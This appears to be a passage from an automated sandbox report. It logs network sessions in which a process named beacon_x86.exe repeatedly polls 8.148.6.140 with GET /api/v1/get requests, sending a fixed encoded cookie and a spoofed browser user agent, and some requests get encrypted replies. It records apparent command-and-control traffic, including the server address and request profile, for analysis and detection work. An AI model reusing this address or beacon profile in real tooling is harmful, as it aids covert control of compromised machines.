        Data Raw: 43 4b 78 41 74 2b 6f 61 2b 4a 36 6f 44 6b 48 48 57 6f 30 6e 75 75 4d 4b 36 67 38 58 57 4a 7a 4a 44 56 6a 67 30 6c 58 53 53 52 32 64 44 70 6c 6b 58 61 53 56 4e 6b 30 57 6c 30 35 47 4f 52 6d 63 31 59 49 58 33 76 65 44 62 33 74 68 65 32 33 39 4f 41 6e 42 35 35 31 2b 75 33 39 78 71 73 6e 54 62 53 64 55 52 48 5a 37 36 36 64 53 74 66 53 43 44 59 47 6c 72 48 53 6e 77 53 32 59 36 69 7a 4e 44 32 41 69 59 50 34 66 55 63 55 57 72 68 34 66 42 73 6b 2b 66 62 47 62 46 4c 48 45 4b 57 33 47 51 43 32 78 38 5a 76 49 68 71 78 58 37 38 5a 42 58 2f 66 4a 33 4e 57 6b 42 36 61 31 30 2b 2b 48 46 44 6c 6d 5a 4f 42 4b 6e 67 46 73 56 48 6c 52 65 4e 61 30 58 74 52 6b 2b 49 63 51 65 36 62 6b 41 34 6a 50 4a 63 62 4a 34 50 74 43 31 77 65 41 43 46 52 46 79 45 79 58 4d 6c 36 42 6a 56 41 79 38 42 62 71 77 6e 7a 41 65 47 35 6a 4c 75 58 54 69 71 38 53 71 55 33 38 59 48 6e 65 35 6f 43 74 76 51 6f 52 38 38 6a 62 6c 33 30 3d
        Data Ascii: CKxAt+oa+J6oDkHHWo0nuuMK6g8XWJzJDVjg0lXSSR2dDplkXaSVNk0Wl05GORmc1YIX3veDb3the239OAnB551+u39xqsnTbSdURHZ766dStfSCDYGlrHSnwS2Y6izND2AiYP4fUcUWrh4fBsk+fbGbFLHEKW3GQC2x8ZvIhqxX78ZBX/fJ3NWkB6a10++HFDlmZOBKngFsVHlReNa0XtRk+IcQe6bkA4jPJcbJ4PtC1weACFRFyEyXMl6BjVAy8BbqwnzAeG5jLuXTiq8SqU38YHne5oCtvQoR88jbl30=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        20192.168.2.8497298.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:48.935045004 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:52.894654989 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:52 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 46 57 45 4c 64 67 53 37 6d 76 51 4c 78 66 35 76 64 42 39 38 4d 44 4c 6a 38 39 30 38 6b 31 55 2b 55 66 41 70 52 43 44 63 44 4f 46 43 4e 57 35 55 4a 4c 6d 71 35 6b 5a 61 41 48 4b 30 30 74 54 2f 5a 4e 6b 48 52 39 49 52 43 7a 77 70 44 6c 57 77 43 33 31 43 43 47 6f 66 66 4e 31 47 67 74 6b 53 65 74 78 69 37 65 46 54 54 5a 6d 43 46 48 4d 36 4b 63 33 56 79 48 64 72 69 47 2f 5a 51 59 66 78 49 32 7a 6e 5a 77 36 38 55 52 69 37 53 71 62 4f 32 55 61 6e 34 4a 75 65 69 55 36 36 43 63 4e 6c 47 6f 32 66 39 34 39 37 31 55 54 56 30 78 42 30 49 66 38 34 51 74 39 4b 39 2f 34 64 36 44 65 63 2b 6f 35 4c 67 62 72 6f 58 61 6f 33 64 41 59 31 7a 45 4f 53 38 2b 71 43 4f 4f 33 33 4c 71 42 68 42 2b 53 76 38 59 70 61 70 76 2f 4e 6d 34 31 53 6b 47 54 74 48 73 35 79 46 2f 55 37 4b 2f 49 62 48 35 58 75 53 58 7a 5a 62 72 41 47 6a 70 67 4c 63 72 4c 67 53 77 3d 3d
        Data Ascii: FWELdgS7mvQLxf5vdB98MDLj8908k1U+UfApRCDcDOFCNW5UJLmq5kZaAHK00tT/ZNkHR9IRCzwpDlWwC31CCGoffN1GgtkSetxi7eFTTZmCFHM6Kc3VyHdriG/ZQYfxI2znZw68URi7SqbO2Uan4JueiU66CcNlGo2f94971UTV0xB0If84Qt9K9/4d6Dec+o5LgbroXao3dAY1zEOS8+qCOO33LqBhB+Sv8Ypapv/Nm41SkGTtHs5yF/U7K/IbH5XuSXzZbrAGjpgLcrLgSw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        21192.168.2.8497308.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:53.014978886 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:54.003207922 CET272INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:53 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 34 6c 72 44 32 75 51 2b 7a 36 53 72 69 6f 72 5a 4b 5a 31 5a 6a 4e 33 62 4e 30 52 37 72 71 34 61 79 4b 59 49 32 47 73 50 6b 77 77 41 6d 53 66 42 58 37 31 76 53 4f 74 48 6a 5a 69 4c 63 4b 61 68 6d 51 4b 56 48 70 39 63 2b 39 62 72 41 55 72 43 67 4b 6b 70 43 77 3d 3d
        Data Ascii: 4lrD2uQ+z6SriorZKZ1ZjN3bN0R7rq4ayKYI2GsPkwwAmSfBX71vSOtHjZiLcKahmQKVHp9c+9brAUrCgKkpCw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        22192.168.2.8497318.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:54.142810106 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:58.124161005 CET248INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:57 GMT
        Server: nginx
        Content-Length: 64
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6a 55 46 61 78 6c 4d 4a 58 2f 72 58 55 6b 70 43 76 38 36 53 44 55 5a 75 54 56 4d 55 4b 48 37 7a 72 55 35 57 49 6d 50 68 53 65 68 2b 48 35 65 66 34 72 36 4d 34 32 4f 4b 4c 56 56 71 6c 2b 78 45
        Data Ascii: jUFaxlMJX/rXUkpCv86SDUZuTVMUKH7zrU5WImPhSeh+H5ef4r6M42OKLVVql+xE


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        23192.168.2.8497328.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:58.247679949 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:59.213568926 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:59 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 31 67 39 53 53 77 43 6c 6e 34 61 44 2f 2b 66 41 32 35 63 44 4a 44 50 6a 42 58 36 57 56 4b 72 57 4c 59 4c 43 32 51 6d 79 32 69 52 47 34 5a 49 49 43 68 67 50 4e 6e 6e 63 7a 42 4c 73 6c 73 73 2f 46 68 51 51 75 63 42 53 65 58 72 7a 30 78 4b 78 31 79 62 6c 4e 55 75 78 63 52 36 4f 53 69 50 46 6f 51 61 6c 44 2b 6a 74 70 2f 45 4d 71 74 53 4f 2f 30 5a 72 43 6e 6c 57 30 68 31 44 6b 61 53 65 43 2b 6e 5a 58 77 43 71 6a 4e 59 4e 4e 6a 44 34 42 44 4b 2b 49 75 67 4b 59 33 37 54 4e 4b 4a 46 6d 76 73 42 56 6c 49 6b 68 38 34 52 2b 78 4b 77 49 6b 48 2b 75 65 2f 78 64 6a 4d 75 52 64 4d 5a 70 62 45 38 62 37 6f 66 55 35 65 30 4e 35 41 2b 67 57 66 30 37 67 3d 3d
        Data Ascii: 1g9SSwCln4aD/+fA25cDJDPjBX6WVKrWLYLC2Qmy2iRG4ZIIChgPNnnczBLslss/FhQQucBSeXrz0xKx1yblNUuxcR6OSiPFoQalD+jtp/EMqtSO/0ZrCnlW0h1DkaSeC+nZXwCqjNYNNjD4BDK+IugKY37TNKJFmvsBVlIkh84R+xKwIkH+ue/xdjMuRdMZpbE8b7ofU5e0N5A+gWf07g==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        24192.168.2.8497338.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:59.325453043 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        25192.168.2.8497358.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:03.525893927 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        26192.168.2.8497368.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:04.513386965 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:05.492219925 CET549INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:05 GMT
        Server: nginx
        Content-Length: 364
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 71 68 54 4f 48 35 4c 2f 48 53 4a 66 57 36 51 76 56 77 6d 72 76 5a 75 65 70 73 53 50 41 42 68 4e 59 4d 61 50 4b 52 70 75 72 51 45 37 32 44 6d 61 51 42 37 62 6d 34 58 73 39 50 42 50 68 73 70 47 76 42 67 77 4d 36 6b 4d 4b 67 37 63 6f 4c 46 2f 72 4d 51 58 63 6a 6f 50 6d 66 43 34 43 6a 34 48 4c 44 76 73 6c 48 7a 31 51 39 32 37 43 58 37 37 65 6a 4e 30 2f 34 67 74 51 2f 74 73 54 33 52 2f 70 37 55 4f 4b 53 4c 6b 31 6f 34 68 58 46 63 50 47 77 32 62 30 67 75 52 50 36 50 59 69 57 6c 66 4d 44 49 6c 54 43 4c 50 4b 67 58 57 41 52 44 74 48 71 61 57 6b 6e 57 5a 6d 65 38 51 65 6c 44 55 57 66 77 31 33 64 70 74 55 67 6b 45 61 49 46 4b 70 56 51 31 42 69 38 52 4b 59 6b 44 7a 51 39 68 35 53 30 67 56 4f 69 34 6e 46 5a 6d 72 33 43 66 52 45 55 37 78 58 32 46 30 63 4d 44 36 52 4c 6b 45 45 44 58 71 4d 54 54 4b 67 62 68 62 72 79 66 34 75 4b 65 57 47 48 68 35 69 4c 4e 67 56 69 6f 47 32 4d 6b 55 78 2b 41 62 6a 46 50 79 49 33 79 34 37 45 6e 52 4a 42 70 72 4d 61 44 6d 2b 74 64 6d 6b 39 6f 67 73 4a 64 63 53 57 69 4b 77 53 51 42 54 [TRUNCATED]
        Data Ascii: qhTOH5L/HSJfW6QvVwmrvZuepsSPABhNYMaPKRpurQE72DmaQB7bm4Xs9PBPhspGvBgwM6kMKg7coLF/rMQXcjoPmfC4Cj4HLDvslHz1Q927CX77ejN0/4gtQ/tsT3R/p7UOKSLk1o4hXFcPGw2b0guRP6PYiWlfMDIlTCLPKgXWARDtHqaWknWZme8QelDUWfw13dptUgkEaIFKpVQ1Bi8RKYkDzQ9h5S0gVOi4nFZmr3CfREU7xX2F0cMD6RLkEEDXqMTTKgbhbryf4uKeWGHh5iLNgVioG2MkUx+AbjFPyI3y47EnRJBprMaDm+tdmk9ogsJdcSWiKwSQBT2ThydQTccRgG8pzLcYEKO72wg=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        27192.168.2.8497378.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:05.606447935 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        28192.168.2.8497388.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:06.596239090 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        29192.168.2.8497398.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:07.544533968 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:27:08.552177906 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:27:08 GMT
        Server: nginx
        Content-Length: 384
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:27:08.552207947 CET384INData Raw: 71 31 6f 6d 62 69 77 67 4c 33 56 33 52 39 55 6c 4a 71 43 41 72 78 78 45 52 68 63 34 34 55 50 44 66 5a 49 65 78 44 58 79 73 2b 32 51 7a 57 74 53 76 5a 63 43 52 61 49 6a 65 4f 50 79 47 64 33 69 7a 6d 6a 33 54 67 31 78 4e 39 46 78 36 53 73 6a 5a 38
        Data Ascii: q1ombiwgL3V3R9UlJqCArxxERhc44UPDfZIexDXys+2QzWtSvZcCRaIjeOPyGd3izmj3Tg1xN9Fx6SsjZ883asAQ78O5nBxqe4o16X5hK3pOX4OAzEzOYrFmlVWsryX0JyW6KeJMLZy7fqsYQkMWzkBu/UcWknOc0cJtliMjRnE8dk/b80xVMFcksm5dh1EZK3h6Oat2YC5qhMbUz7KbgETea9v6vPDwyB3Wn8JOL/df3t2tmni


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        30192.168.2.8497408.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:08.669513941 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        31192.168.2.8497418.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:09.747112036 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        32192.168.2.8497428.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:13.983182907 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        33192.168.2.8497438.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:14.935813904 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        34192.168.2.8497448.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:19.059979916 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        35192.168.2.8497458.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:20.060554028 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        36192.168.2.8497468.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:21.232831955 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        37192.168.2.8497478.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:25.236464024 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        38192.168.2.8497488.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:27:26.200710058 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
